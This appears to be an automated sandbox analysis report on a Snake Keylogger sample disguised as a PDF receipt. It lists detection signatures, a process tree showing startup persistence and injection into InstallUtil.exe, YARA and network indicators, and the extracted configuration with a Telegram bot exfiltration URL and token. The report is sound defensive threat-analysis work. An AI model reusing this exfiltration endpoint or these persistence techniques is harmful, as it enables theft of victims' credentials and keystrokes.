Edit tour

Windows Analysis Report
dekont_001.pdf.exe

Overview

General Information

Sample name:	dekont_001.pdf.exe
Analysis ID:	1544052
MD5:	d998da7be623b6299e9257fcf5f80e3e
SHA1:	91d22e36b0aa0484136b1ee6ae17abb1f4963927
SHA256:	4bb7ad555a0641fd9020b58ac7fdeb4eab618214f056a489739ad6aa91f528ae
Tags:	exe
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: Suspicious Double Extension File Execution

Yara detected AntiVM3

Yara detected Snake Keylogger

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Drops VBS files to the startup folder

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses an obfuscated file name to hide its real file extension (double extension)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

dekont_001.pdf.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\dekont_001.pdf.exe" MD5: D998DA7BE623B6299E9257FCF5F80E3E)

InstallUtil.exe (PID: 7452 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

wscript.exe (PID: 7776 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

RequiredContract.exe (PID: 7844 cmdline: "C:\Users\user\AppData\Roaming\RequiredContract.exe" MD5: D998DA7BE623B6299E9257FCF5F80E3E)

InstallUtil.exe (PID: 8028 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8007960326:AAFswhlAovIYra6y-Z3vk6uZa4lj11jIino/sendMessage?chat_id=6008123474", "Token": "8007960326:AAFswhlAovIYra6y-Z3vk6uZa4lj11jIino", "Chat_id": "6008123474", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1489a:$a1: get_encryptedPassword 0x14b86:$a2: get_encryptedUsername 0x146a6:$a3: get_timePasswordChanged 0x147a1:$a4: get_passwordField 0x148b0:$a5: set_encryptedPassword 0x15f0c:$a7: get_logins 0x15e6f:$a10: KeyLoggerEventArgs 0x15ada:$a11: KeyLoggerEventArgsEventHandler
00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x198c0:$x1: $%SMTPDV$ 0x182a4:$x2: $#TheHashHere%& 0x19868:$x3: %FTPDV$ 0x18244:$x4: $%TelegramDv$ 0x15ada:$x5: KeyLoggerEventArgs 0x15e6f:$x5: KeyLoggerEventArgs 0x1988c:$m2: Clipboard Logs ID 0x19aca:$m2: Screenshot Logs ID 0x19bda:$m2: keystroke Logs ID 0x19eb4:$m3: SnakePW 0x19aa2:$m4: \SnakeKeylogger\
00000001.00000002.4215771932.0000000003054000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1844604505.0000000006770000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x196a0:$x1: $%SMTPDV$ 0x19648:$x3: %FTPDV$ 0x1966c:$m2: Clipboard Logs ID 0x198aa:$m2: Screenshot Logs ID 0x199ba:$m2: keystroke Logs ID 0x19c94:$m3: SnakePW 0x19882:$m4: \SnakeKeylogger\
00000006.00000002.2012152493.000000000328F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1514a:$a1: get_encryptedPassword 0x15436:$a2: get_encryptedUsername 0x14f56:$a3: get_timePasswordChanged 0x15051:$a4: get_passwordField 0x15160:$a5: set_encryptedPassword 0x167bc:$a7: get_logins 0x1671f:$a10: KeyLoggerEventArgs 0x1638a:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1a170:$x1: $%SMTPDV$ 0x18b54:$x2: $#TheHashHere%& 0x1a118:$x3: %FTPDV$ 0x18af4:$x4: $%TelegramDv$ 0x1638a:$x5: KeyLoggerEventArgs 0x1671f:$x5: KeyLoggerEventArgs 0x1a13c:$m2: Clipboard Logs ID 0x1a37a:$m2: Screenshot Logs ID 0x1a48a:$m2: keystroke Logs ID 0x1a764:$m3: SnakePW 0x1a352:$m4: \SnakeKeylogger\
00000001.00000002.4215771932.0000000002E91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000002.4215341701.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x15fea:$a1: get_encryptedPassword 0x162d6:$a2: get_encryptedUsername 0x15df6:$a3: get_timePasswordChanged 0x15ef1:$a4: get_passwordField 0x16000:$a5: set_encryptedPassword 0x1765c:$a7: get_logins 0x175bf:$a10: KeyLoggerEventArgs 0x1722a:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1b010:$x1: $%SMTPDV$ 0x199f4:$x2: $#TheHashHere%& 0x1afb8:$x3: %FTPDV$ 0x19994:$x4: $%TelegramDv$ 0x1722a:$x5: KeyLoggerEventArgs 0x175bf:$x5: KeyLoggerEventArgs 0x1afdc:$m2: Clipboard Logs ID 0x1b21a:$m2: Screenshot Logs ID 0x1b32a:$m2: keystroke Logs ID 0x1b604:$m3: SnakePW 0x1b1f2:$m4: \SnakeKeylogger\
00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x15622:$a1: get_encryptedPassword 0x1590e:$a2: get_encryptedUsername 0x1542e:$a3: get_timePasswordChanged 0x15529:$a4: get_passwordField 0x15638:$a5: set_encryptedPassword 0x16c94:$a7: get_logins 0x16bf7:$a10: KeyLoggerEventArgs 0x16862:$a11: KeyLoggerEventArgsEventHandler
00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1a648:$x1: $%SMTPDV$ 0x1902c:$x2: $#TheHashHere%& 0x1a5f0:$x3: %FTPDV$ 0x18fcc:$x4: $%TelegramDv$ 0x16862:$x5: KeyLoggerEventArgs 0x16bf7:$x5: KeyLoggerEventArgs 0x1a614:$m2: Clipboard Logs ID 0x1a852:$m2: Screenshot Logs ID 0x1a962:$m2: keystroke Logs ID 0x1ac3c:$m3: SnakePW 0x1a82a:$m4: \SnakeKeylogger\
00000000.00000002.1830048122.00000000028DF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1963c:$x1: $%SMTPDV$ 0x195e4:$x3: %FTPDV$ 0x19608:$m2: Clipboard Logs ID 0x19846:$m2: Screenshot Logs ID 0x19956:$m2: keystroke Logs ID 0x19c30:$m3: SnakePW 0x1981e:$m4: \SnakeKeylogger\
00000007.00000002.4215341701.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: dekont_001.pdf.exe PID: 7304	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: dekont_001.pdf.exe PID: 7304	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dekont_001.pdf.exe PID: 7304	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: dekont_001.pdf.exe PID: 7304	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: dekont_001.pdf.exe PID: 7304	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x567bf:$a1: get_encryptedPassword 0xd8345:$a1: get_encryptedPassword 0x56aa1:$a2: get_encryptedUsername 0xd8627:$a2: get_encryptedUsername 0x565d5:$a3: get_timePasswordChanged 0xd815b:$a3: get_timePasswordChanged 0x566d0:$a4: get_passwordField 0xd8256:$a4: get_passwordField 0x567d5:$a5: set_encryptedPassword 0xd835b:$a5: set_encryptedPassword 0x58abc:$a7: get_logins 0xda642:$a7: get_logins 0x58a1f:$a10: KeyLoggerEventArgs 0xda5a5:$a10: KeyLoggerEventArgs 0x5868a:$a11: KeyLoggerEventArgsEventHandler 0xda210:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: dekont_001.pdf.exe PID: 7304	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x5868a:$x5: KeyLoggerEventArgs 0x58a1f:$x5: KeyLoggerEventArgs 0x591e5:$x5: KeyLoggerEventArgs 0x59546:$x5: KeyLoggerEventArgs 0xda210:$x5: KeyLoggerEventArgs 0xda5a5:$x5: KeyLoggerEventArgs 0xdad6b:$x5: KeyLoggerEventArgs 0xdb0cc:$x5: KeyLoggerEventArgs 0x5ae3d:$m2: Clipboard Logs ID 0x5af43:$m2: Screenshot Logs ID 0x5af99:$m2: keystroke Logs ID 0xdc9c3:$m2: Clipboard Logs ID 0xdcac9:$m2: Screenshot Logs ID 0xdcb1f:$m2: keystroke Logs ID 0x107ff4:$m2: Clipboard Logs ID 0x1080fa:$m2: Screenshot Logs ID 0x108150:$m2: keystroke Logs ID 0x5b0ce:$m3: SnakePW 0xdcc54:$m3: SnakePW 0x108285:$m3: SnakePW 0x5af2f:$m4: \SnakeKeylogger\
Process Memory Space: InstallUtil.exe PID: 7452	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 7452	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: InstallUtil.exe PID: 7452	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1748c:$a1: get_encryptedPassword 0x1776e:$a2: get_encryptedUsername 0x172a2:$a3: get_timePasswordChanged 0x1739d:$a4: get_passwordField 0x174a2:$a5: set_encryptedPassword 0x19789:$a7: get_logins 0x196ec:$a10: KeyLoggerEventArgs 0x19357:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: InstallUtil.exe PID: 7452	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19357:$x5: KeyLoggerEventArgs 0x196ec:$x5: KeyLoggerEventArgs 0x19eb2:$x5: KeyLoggerEventArgs 0x1a213:$x5: KeyLoggerEventArgs 0x1bb0a:$m2: Clipboard Logs ID 0x1bc10:$m2: Screenshot Logs ID 0x1bc66:$m2: keystroke Logs ID 0x1bd9b:$m3: SnakePW 0x1bbfc:$m4: \SnakeKeylogger\
Process Memory Space: RequiredContract.exe PID: 7844	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: RequiredContract.exe PID: 7844	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RequiredContract.exe PID: 7844	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RequiredContract.exe PID: 7844	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: RequiredContract.exe PID: 7844	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x6b26c:$a1: get_encryptedPassword 0x6b54e:$a2: get_encryptedUsername 0x6b082:$a3: get_timePasswordChanged 0x6b17d:$a4: get_passwordField 0x6b282:$a5: set_encryptedPassword 0x6d569:$a7: get_logins 0x6d4cc:$a10: KeyLoggerEventArgs 0x6d137:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RequiredContract.exe PID: 7844	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x6d137:$x5: KeyLoggerEventArgs 0x6d4cc:$x5: KeyLoggerEventArgs 0x6dc92:$x5: KeyLoggerEventArgs 0x6dff3:$x5: KeyLoggerEventArgs 0x41f8:$m2: Clipboard Logs ID 0x42fe:$m2: Screenshot Logs ID 0x4354:$m2: keystroke Logs ID 0x6f8ea:$m2: Clipboard Logs ID 0x6f9f0:$m2: Screenshot Logs ID 0x6fa46:$m2: keystroke Logs ID 0x4489:$m3: SnakePW 0x6fb7b:$m3: SnakePW 0x42ea:$m4: \SnakeKeylogger\ 0x6f9dc:$m4: \SnakeKeylogger\
Process Memory Space: InstallUtil.exe PID: 8028	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 8028	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 42 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.dekont_001.pdf.exe.6770000.10.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.dekont_001.pdf.exe.3839550.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.dekont_001.pdf.exe.3839550.4.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.dekont_001.pdf.exe.3839550.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c9a:$a1: get_encryptedPassword 0x12f86:$a2: get_encryptedUsername 0x12aa6:$a3: get_timePasswordChanged 0x12ba1:$a4: get_passwordField 0x12cb0:$a5: set_encryptedPassword 0x1430c:$a7: get_logins 0x1426f:$a10: KeyLoggerEventArgs 0x13eda:$a11: KeyLoggerEventArgsEventHandler
0.2.dekont_001.pdf.exe.3839550.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a676:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x198a8:$a3: \Google\Chrome\User Data\Default\Login Data 0x19cdb:$a4: \Orbitum\User Data\Default\Login Data 0x1ad1a:$a5: \Kometa\User Data\Default\Login Data
0.2.dekont_001.pdf.exe.3839550.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1385d:$s1: UnHook 0x13864:$s2: SetHook 0x1386c:$s3: CallNextHook 0x13879:$s4: _hook
0.2.dekont_001.pdf.exe.3839550.4.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17cc0:$x1: $%SMTPDV$ 0x166a4:$x2: $#TheHashHere%& 0x17c68:$x3: %FTPDV$ 0x16644:$x4: $%TelegramDv$ 0x13eda:$x5: KeyLoggerEventArgs 0x1426f:$x5: KeyLoggerEventArgs 0x17c8c:$m2: Clipboard Logs ID 0x17eca:$m2: Screenshot Logs ID 0x17fda:$m2: keystroke Logs ID 0x182b4:$m3: SnakePW 0x17ea2:$m4: \SnakeKeylogger\
0.2.dekont_001.pdf.exe.3839550.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.dekont_001.pdf.exe.3839550.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.dekont_001.pdf.exe.3839550.4.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.dekont_001.pdf.exe.3839550.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a9a:$a1: get_encryptedPassword 0x14d86:$a2: get_encryptedUsername 0x148a6:$a3: get_timePasswordChanged 0x149a1:$a4: get_passwordField 0x14ab0:$a5: set_encryptedPassword 0x1610c:$a7: get_logins 0x1606f:$a10: KeyLoggerEventArgs 0x15cda:$a11: KeyLoggerEventArgsEventHandler
0.2.dekont_001.pdf.exe.3839550.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c476:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b6a8:$a3: \Google\Chrome\User Data\Default\Login Data 0x1badb:$a4: \Orbitum\User Data\Default\Login Data 0x1cb1a:$a5: \Kometa\User Data\Default\Login Data
0.2.dekont_001.pdf.exe.3839550.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1565d:$s1: UnHook 0x15664:$s2: SetHook 0x1566c:$s3: CallNextHook 0x15679:$s4: _hook
0.2.dekont_001.pdf.exe.3839550.4.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19ac0:$x1: $%SMTPDV$ 0x184a4:$x2: $#TheHashHere%& 0x19a68:$x3: %FTPDV$ 0x18444:$x4: $%TelegramDv$ 0x15cda:$x5: KeyLoggerEventArgs 0x1606f:$x5: KeyLoggerEventArgs 0x19a8c:$m2: Clipboard Logs ID 0x19cca:$m2: Screenshot Logs ID 0x19dda:$m2: keystroke Logs ID 0x1a0b4:$m3: SnakePW 0x19ca2:$m4: \SnakeKeylogger\
Click to see the 9 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\dekont_001.pdf.exe", CommandLine: "C:\Users\user\Desktop\dekont_001.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\dekont_001.pdf.exe, NewProcessName: C:\Users\user\Desktop\dekont_001.pdf.exe, OriginalFileName: C:\Users\user\Desktop\dekont_001.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\dekont_001.pdf.exe", ProcessId: 7304, ProcessName: dekont_001.pdf.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs" , ProcessId: 7776, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs" , ProcessId: 7776, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\dekont_001.pdf.exe, ProcessId: 7304, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T19:04:19.122909+0100	2803305	3	Unknown Traffic	192.168.2.4	49733	188.114.97.3	443	TCP
2024-10-28T19:04:22.531398+0100	2803305	3	Unknown Traffic	192.168.2.4	49737	188.114.97.3	443	TCP
2024-10-28T19:04:25.945477+0100	2803305	3	Unknown Traffic	192.168.2.4	49745	188.114.97.3	443	TCP
2024-10-28T19:04:27.659639+0100	2803305	3	Unknown Traffic	192.168.2.4	49748	188.114.97.3	443	TCP
2024-10-28T19:04:37.154934+0100	2803305	3	Unknown Traffic	192.168.2.4	49755	188.114.97.3	443	TCP
2024-10-28T19:04:40.531396+0100	2803305	3	Unknown Traffic	192.168.2.4	49759	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T19:04:17.171949+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49731	132.226.247.73	80	TCP
2024-10-28T19:04:18.406339+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49731	132.226.247.73	80	TCP
2024-10-28T19:04:20.062755+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49734	132.226.247.73	80	TCP
2024-10-28T19:04:35.218856+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49753	132.226.247.73	80	TCP
2024-10-28T19:04:36.390779+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49753	132.226.247.73	80	TCP
2024-10-28T19:04:38.078355+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49756	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: dekont_001.pdf.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\RequiredContract.exe

Avira: detection malicious, Label: HEUR/AGEN.1309900

Found malware configuration

Source: 00000001.00000002.4215771932.0000000002E91000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8007960326:AAFswhlAovIYra6y-Z3vk6uZa4lj11jIino/sendMessage?chat_id=6008123474", "Token": "8007960326:AAFswhlAovIYra6y-Z3vk6uZa4lj11jIino", "Chat_id": "6008123474", "Version": "5.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\RequiredContract.exe

ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: dekont_001.pdf.exe

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\RequiredContract.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: dekont_001.pdf.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: dekont_001.pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49754 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.4:49746 version: TLS 1.2

Source: dekont_001.pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

